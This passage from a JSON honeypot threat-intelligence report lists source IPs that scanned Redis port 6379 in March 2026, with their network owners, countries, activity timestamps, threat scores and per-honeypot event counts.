      }
    },
    "180.76.114.78": {
      "attack_count": 98,
      "first_seen": "2026-03-04T18:14:50.000Z",
      "last_seen": "2026-03-31T22:37:28.605Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 43.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 12.8,
        "persistence": 23.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 19,
        "days_active_30d": 28,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T18:15:54.909000+00:00",
        "last_seen_30d": "2026-03-31T22:37:28.605000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 19
      }
    },
    "49.115.217.27": {
      "attack_count": 74,
      "first_seen": "2026-03-03T17:17:00.000Z",
      "last_seen": "2026-03-31T09:52:46.384Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 42.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.5,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T17:18:01.077000+00:00",
        "last_seen_30d": "2026-03-31T09:52:46.384000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 14
      }
    },
    "14.103.174.237": {
      "attack_count": 66,
      "first_seen": "2026-03-05T17:57:32.000Z",
      "last_seen": "2026-03-26T19:22:03.680Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4811,
      "as_org": "China Telecom Group",
      "threat_score": 30.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.5,
        "persistence": 18.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 22,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T17:58:42.262000+00:00",
        "last_seen_30d": "2026-03-26T19:22:03.680000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 14
      }
    },
    "20.233.204.10": {
      "attack_count": 65,
      "first_seen": "2026-03-02T19:19:16.000Z",
      "last_seen": "2026-03-30T22:14:45.244Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Arab Emirates",
      "country_code": "AE",
      "city": "Dubai",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 49.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.5,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 28,
        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T19:19:16+00:00",
        "last_seen_30d": "2026-03-30T22:14:45.244000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 21,
        "Suricata": 7
      }
    },
    "120.205.80.220": {
      "attack_count": 60,
      "first_seen": "2026-03-06T23:16:14.000Z",
      "last_seen": "2026-03-31T08:12:15.047Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 9808,
      "as_org": "China Mobile Communications Group Co., Ltd.",
      "threat_score": 47.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.0,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 25,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T23:16:14+00:00",
        "last_seen_30d": "2026-03-31T08:12:15.047000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 18,
        "Suricata": 7
      }
    },
    "161.35.120.3": {
      "attack_count": 53,
      "first_seen": "2026-03-03T17:45:36.000Z",
      "last_seen": "2026-03-20T20:29:46.704Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 24.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 12.3,
        "persistence": 15.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 17,
        "days_active_30d": 18,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T17:46:42.013000+00:00",
        "last_seen_30d": "2026-03-20T20:29:46.704000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 8
      }
    },
    "207.231.108.199": {
      "attack_count": 46,
      "first_seen": "2026-03-02T07:55:55.000Z",
      "last_seen": "2026-03-18T08:46:48.793Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 40676,
      "as_org": "Psychz Networks",
      "threat_score": 22.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.0,
        "persistence": 14.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 17,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T07:55:55+00:00",
        "last_seen_30d": "2026-03-18T08:46:48.793000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 5
      }
    },
    "45.82.78.104": {
      "attack_count": 46,
      "first_seen": "2026-03-18T05:00:26.000Z",
      "last_seen": "2026-03-18T05:01:41.199Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": null,
      "asn": 212512,
      "as_org": "Detai Prosperous Technologies Limited",
      "threat_score": 92.3,
      "threat_level": "critical",
      "score_components": {
        "frequency": 27.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 535,
        "days_active_30d": 30,
        "ports_targeted_30d": 63,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T07:29:42+00:00",
        "last_seen_30d": "2026-03-31T20:34:21.476000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 273,
        "Honeytrap": 240,
        "Redishoneypot": 13,
        "Dionaea": 9
      }
    },
    "20.175.198.133": {
      "attack_count": 45,
      "first_seen": "2026-03-07T10:13:48.000Z",
      "last_seen": "2026-03-29T01:16:50.251Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 41.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.0,
        "persistence": 19.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 23,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T10:13:48+00:00",
        "last_seen_30d": "2026-03-29T01:16:50.251000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 5
      }
    },
    "139.198.30.179": {
      "attack_count": 43,
      "first_seen": "2026-03-16T14:33:24.000Z",
      "last_seen": "2026-03-27T05:44:49.156Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 59078,
      "as_org": "Yunify Technologies Inc.",
      "threat_score": 29.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 12.3,
        "persistence": 10.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 17,
        "days_active_30d": 12,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-16T14:33:24+00:00",
        "last_seen_30d": "2026-03-27T05:44:49.156000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 5
      }
    },
    "47.116.163.71": {
      "attack_count": 40,
      "first_seen": "2026-03-28T11:00:54.000Z",
      "last_seen": "2026-03-28T11:03:19.565Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 24.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 14.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 30,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-28T11:01:04+00:00",
        "last_seen_30d": "2026-03-28T11:03:19.565000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 2
      }
    },
    "221.236.21.55": {
      "attack_count": 32,
      "first_seen": "2026-03-04T09:05:48.000Z",
      "last_seen": "2026-03-29T09:25:09.855Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 38283,
      "as_org": "CHINANET SiChuan Telecom Internet Data Center",
      "threat_score": 34.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T09:06:58.391000+00:00",
        "last_seen_30d": "2026-03-29T09:25:09.855000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6
      }
    },
    "107.150.31.215": {
      "attack_count": 29,
      "first_seen": "2026-03-06T23:00:21.000Z",
      "last_seen": "2026-03-25T16:32:36.462Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 36352,
      "as_org": "HostPapa",
      "threat_score": 31.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 16.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 20,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T23:00:21+00:00",
        "last_seen_30d": "2026-03-25T16:32:36.462000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "125.88.205.65": {
      "attack_count": 28,
      "first_seen": "2026-03-07T16:07:59.000Z",
      "last_seen": "2026-03-19T06:13:45.378Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 58466,
      "as_org": "CHINANET Guangdong province network",
      "threat_score": 20.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 10.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 13,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T16:07:59+00:00",
        "last_seen_30d": "2026-03-19T06:13:45.378000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "193.29.13.64": {
      "attack_count": 28,
      "first_seen": "2026-03-14T16:39:31.000Z",
      "last_seen": "2026-03-14T17:40:07.902Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Romania",
      "country_code": "RO",
      "city": null,
      "asn": 42397,
      "as_org": "Bunea TELECOM SRL",
      "threat_score": 32.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 6080,
        "days_active_30d": 1,
        "ports_targeted_30d": 442,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-14T16:39:32+00:00",
        "last_seen_30d": "2026-03-14T17:40:40.715000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3657,
        "Honeytrap": 2373,
        "Dionaea": 15,
        "ConPot": 12,
        "Redishoneypot": 9,
        "Cowrie": 6,
        "Dicompot": 3,
        "Miniprint": 3,
        "CitrixHoneypot": 2
      }
    },
    "20.175.205.56": {
      "attack_count": 28,
      "first_seen": "2026-03-13T12:38:30.000Z",
      "last_seen": "2026-03-22T03:39:52.395Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Toronto",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 21.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 8.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 10,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-13T12:38:30+00:00",
        "last_seen_30d": "2026-03-22T03:39:52.395000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "199.45.154.32": {
      "attack_count": 27,
      "first_seen": "2026-03-02T20:10:49.000Z",
      "last_seen": "2026-03-30T05:26:51.165Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398722,
      "as_org": "Censys, Inc.",
      "threat_score": 80.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1230,
        "days_active_30d": 30,
        "ports_targeted_30d": 312,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:20:42.354000+00:00",
        "last_seen_30d": "2026-03-31T22:35:31.137000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1230
      }
    },
    "65.49.1.108": {
      "attack_count": 26,
      "first_seen": "2026-03-28T13:38:40.000Z",
      "last_seen": "2026-03-28T13:40:38.670Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 345,
        "days_active_30d": 30,
        "ports_targeted_30d": 85,
        "honeypots_triggered_30d": 13,
        "first_seen_30d": "2026-03-02T03:39:56+00:00",
        "last_seen_30d": "2026-03-31T12:09:58.836000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 205,
        "Honeytrap": 81,
        "Mailoney": 12,
        "Redishoneypot": 11,
        "Cowrie": 9,
        "H0neytr4p": 9,
        "Miniprint": 8,
        "ConPot": 2,
        "Dionaea": 2,
        "ElasticPot": 2,
        "Honeyaml": 2,
        "CitrixHoneypot": 1,
        "Ipphoney": 1
      }
    },
    "80.94.92.17": {
      "attack_count": 25,
      "first_seen": "2026-03-14T21:54:07.000Z",
      "last_seen": "2026-03-15T16:40:07.627Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Romania",
      "country_code": "RO",
      "city": null,
      "asn": 47890,
      "as_org": "Unmanaged Ltd",
      "threat_score": 35.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 3590,
        "days_active_30d": 2,
        "ports_targeted_30d": 998,
        "honeypots_triggered_30d": 15,
        "first_seen_30d": "2026-03-14T21:45:18.865000+00:00",
        "last_seen_30d": "2026-03-15T20:49:06.632000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2467,
        "Honeytrap": 1064,
        "Dionaea": 10,
        "Redishoneypot": 8,
        "Ciscoasa": 7,
        "ConPot": 6,
        "Cowrie": 6,
        "CitrixHoneypot": 4,
        "ElasticPot": 4,
        "H0neytr4p": 4,
        "Tanner": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "Honeyaml": 2,
        "Miniprint": 1
      }
    },
    "91.230.168.12": {
      "attack_count": 25,
      "first_seen": "2026-03-06T23:59:40.000Z",
      "last_seen": "2026-03-27T21:12:43.476Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 92.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 22.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 197,
        "days_active_30d": 30,
        "ports_targeted_30d": 67,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T05:50:09+00:00",
        "last_seen_30d": "2026-03-31T20:42:15.292000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 141,
        "Honeytrap": 52,
        "Cowrie": 2,
        "Dionaea": 1,
        "Tanner": 1
      }
    },
    "172.202.118.18": {
      "attack_count": 23,
      "first_seen": "2026-03-09T08:36:12.000Z",
      "last_seen": "2026-03-09T08:39:51.928Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Des Moines",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 78.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 17.0,
        "persistence": 25,
        "diversity": 16,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 50,
        "days_active_30d": 30,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T17:35:49.370000+00:00",
        "last_seen_30d": "2026-03-31T20:46:50.990000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 32,
        "Honeytrap": 10,
        "Redishoneypot": 5,
        "Dionaea": 3
      }
    },
    "185.242.226.5": {
      "attack_count": 21,
      "first_seen": "2026-03-03T17:58:31.000Z",
      "last_seen": "2026-03-24T16:26:13.110Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 63.2,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 1112,
        "days_active_30d": 25,
        "ports_targeted_30d": 509,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:02:56.263000+00:00",
        "last_seen_30d": "2026-03-26T01:04:47.118000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1112
      }
    },
    "209.38.136.79": {
      "attack_count": 21,
      "first_seen": "2026-03-06T02:11:46.000Z",
      "last_seen": "2026-03-06T02:12:51.463Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 62.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 14.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 115459,
        "days_active_30d": 17,
        "ports_targeted_30d": 63876,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-06T02:11:09+00:00",
        "last_seen_30d": "2026-03-22T22:54:24.333000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 102512,
        "Honeytrap": 12888,
        "Cowrie": 12,
        "Dionaea": 10,
        "ConPot": 9,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "18.188.57.88": {
      "attack_count": 20,
      "first_seen": "2026-03-25T02:30:01.000Z",
      "last_seen": "2026-03-30T02:31:17.435Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 76.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 445,
        "days_active_30d": 30,
        "ports_targeted_30d": 172,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:07:47.846000+00:00",
        "last_seen_30d": "2026-03-31T20:03:11.894000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 445
      }
    },
    "4.236.37.185": {
      "attack_count": 19,
      "first_seen": "2026-03-20T06:58:55.000Z",
      "last_seen": "2026-03-21T03:20:24.379Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 15.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-20T06:58:56+00:00",
        "last_seen_30d": "2026-03-21T03:20:24.379000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "47.111.110.34": {
      "attack_count": 19,
      "first_seen": "2026-03-03T02:35:19.000Z",
      "last_seen": "2026-03-15T05:07:07.873Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 14.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.8,
        "persistence": 10.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 13,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T02:36:20.636000+00:00",
        "last_seen_30d": "2026-03-15T05:07:07.873000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 3
      }
    },
    "66.240.223.240": {
      "attack_count": 19,
      "first_seen": "2026-03-12T02:12:31.000Z",
      "last_seen": "2026-03-12T02:13:38.986Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 84.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.3,
        "persistence": 22.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 106,
        "days_active_30d": 27,
        "ports_targeted_30d": 17,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-04T14:07:27.974000+00:00",
        "last_seen_30d": "2026-03-30T03:19:39.104000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 75,
        "Cowrie": 8,
        "Honeytrap": 8,
        "Redishoneypot": 6,
        "H0neytr4p": 4,
        "Dionaea": 3,
        "Tanner": 2
      }
    },
    "89.42.231.182": {
      "attack_count": 19,
      "first_seen": "2026-03-20T17:50:14.000Z",
      "last_seen": "2026-03-20T18:03:36.685Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": null,
      "asn": 206264,
      "as_org": "Amarutu Technology Ltd",
      "threat_score": 79.9,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 4772,
        "days_active_30d": 25,
        "ports_targeted_30d": 484,
        "honeypots_triggered_30d": 15,
        "first_seen_30d": "2026-03-02T05:04:13.530000+00:00",
        "last_seen_30d": "2026-03-26T10:27:28.067000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3407,
        "Honeytrap": 1249,
        "Cowrie": 22,
        "Mailoney": 18,
        "Miniprint": 16,
        "CitrixHoneypot": 13,
        "Honeyaml": 12,
        "Ciscoasa": 9,
        "Dionaea": 6,
        "ConPot": 5,
        "Tanner": 5,
        "Adbhoney": 4,
        "Redishoneypot": 3,
        "Ipphoney": 2,
        "ElasticPot": 1
      }
    },
    "205.210.31.172": {
      "attack_count": 18,
      "first_seen": "2026-03-07T06:54:58.000Z",
      "last_seen": "2026-03-10T08:15:57.078Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 89.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 19.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 88,
        "days_active_30d": 30,
        "ports_targeted_30d": 28,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T00:27:34+00:00",
        "last_seen_30d": "2026-03-31T07:44:44.438000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 61,
        "Honeytrap": 16,
        "Redishoneypot": 6,
        "Cowrie": 4,
        "Dionaea": 1
      }
    },
    "209.15.115.204": {
      "attack_count": 18,
      "first_seen": "2026-03-02T14:09:52.000Z",
      "last_seen": "2026-03-07T05:36:33.875Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Thailand",
      "country_code": "TH",
      "city": null,
      "asn": 135566,
      "as_org": "National Telecom Public Company Limited",
      "threat_score": 5.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 5.0,
        "diversity": 2,
        "spread": 10,
